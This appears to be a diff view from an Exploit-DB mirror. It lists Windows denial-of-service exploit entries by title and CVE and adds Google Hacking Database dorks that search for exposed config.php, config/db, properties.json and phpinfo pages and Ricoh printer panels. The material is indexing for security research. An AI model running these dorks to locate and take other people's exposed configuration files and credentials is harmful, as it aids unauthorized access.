42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,,
42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161
51348,exploits/windows/dos/51348.txt,"Microsoft Windows 11 - 'cmd.exe' Denial of Service",2023-04-08,"Milad karimi",dos,windows,,2023-04-08,2023-04-08,0,,,,,,
20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info
20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info

Can't render this file because it is too large.

91
ghdb.xml
View file

@ -37156,6 +37156,22 @@ Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<date>2021-10-18</date>
<author>Roshdy Essam</author>
</entry>
<entry>
<id>8153</id>
<link>https://www.exploit-db.com/ghdb/8153</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Arnob Biswas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;properties.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;properties.json&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Arnob Biswas</author>
</entry>
<entry>
<id>7303</id>
<link>https://www.exploit-db.com/ghdb/7303</link>
@ -40429,6 +40445,21 @@ Category: Files Containing Juicy Info
<date>2022-09-19</date>
<author>HackerFrenzy</author>
</entry>
<entry>
<id>8155</id>
<link>https://www.exploit-db.com/ghdb/8155</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot; &quot;config/db&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Jerr279</textualDescription>
<query>intitle:&quot;index of &quot; &quot;config/db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; &quot;config/db&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Jerr279</author>
</entry>
<entry>
<id>8132</id>
<link>https://www.exploit-db.com/ghdb/8132</link>
@ -42654,6 +42685,21 @@ DORK: intitle:&quot;index of&quot; &quot;config.js&quot;
<date>2021-10-04</date>
<author>Suman Das</author>
</entry>
<entry>
<id>8154</id>
<link>https://www.exploit-db.com/ghdb/8154</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;config.php&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Jerr279</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.php&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Jerr279</author>
</entry>
<entry>
<id>6048</id>
<link>https://www.exploit-db.com/ghdb/6048</link>
@ -49102,6 +49148,21 @@ Dxtroyer</textualDescription>
<date>2017-04-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>8156</id>
<link>https://www.exploit-db.com/ghdb/8156</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Jerr279</textualDescription>
<query>inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Jerr279</author>
</entry>
<entry>
<id>8152</id>
<link>https://www.exploit-db.com/ghdb/8152</link>
@ -52034,6 +52095,21 @@ Thanks &amp; Regards
<date>2021-01-07</date>
<author>Rushabh Doshi</author>
</entry>
<entry>
<id>8157</id>
<link>https://www.exploit-db.com/ghdb/8157</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;</shortDescription>
<textualDescription># Google Dork: inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;
# Files containing juicy info.
# Date: 13/04/2023
# Exploit Author: Vitor Guaxi</textualDescription>
<query>inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;</query>
<querystring>https://www.google.com/search?q=inurl:info.php intext:&quot;PHP Version&quot; intitle:&quot;phpinfo()&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Vitor guaxi</author>
</entry>
<entry>
<id>4389</id>
<link>https://www.exploit-db.com/ghdb/4389</link>
@ -105922,6 +105998,21 @@ temperature, etc) can be found.
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>8158</id>
<link>https://www.exploit-db.com/ghdb/8158</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Web Image Monitor inurl:mainFrame.cgi</shortDescription>
<textualDescription># Google Dork: intitle:Web Image Monitor inurl:mainFrame.cgi
# Various Online Devices
# Date:14/04/2023
# Exploit Author: Hasan Ali YILDIR</textualDescription>
<query>Google Dork: Recoh Printer Properties Page</query>
<querystring>https://www.google.com/search?q=Google Dork: Recoh Printer Properties Page</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Hasan Ali YILDIR</author>
</entry>
<entry>
<id>4200</id>
<link>https://www.exploit-db.com/ghdb/4200</link>